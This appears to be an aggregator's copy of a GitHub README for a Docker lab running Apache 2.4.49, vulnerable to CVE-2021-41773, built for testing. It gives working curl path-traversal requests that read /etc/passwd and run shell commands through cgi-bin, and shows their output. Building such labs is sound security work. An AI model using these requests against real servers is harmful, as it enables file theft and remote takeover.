GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground
source link: https://github.com/blasty/CVE-2021-41773
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2021-41773 Playground
This is a small Docker recipe for setting up a Debian bookworm based container with an instance of the Apache HTTPd (2.4.49) that is vulnerable to CVE-2021-41773.
CGI has been explicitly enabled so it can be used to test/verify Local file Disclosure behavior as well as Remote Command Execution behavior.
Usage
$ docker-compose build && docker-compose-up
Local file disclosure
$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Remote Code Execution
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Recommend
-
45
cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid...
-
34
Files Permalink Latest commit message Commit time
-
17
Files Permalink Latest commit message Commit time
-
11
CVE-2021-1675 Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) Tested on a fully patched...
-
56
From Lares Labs: Detection & Remediation Information for CVE-2021-1675 & CVE-2021-34527 This repo contains an EVTX sample of the CVE-2021-1675 attack as well as a minimal Sysmon configuration...
-
22
CVE-2021-40444 PoC Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe4073...
-
5
CVE-2021-41773 Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software...
-
11
Files Permalink
-
9
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
-
14
README.md ...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK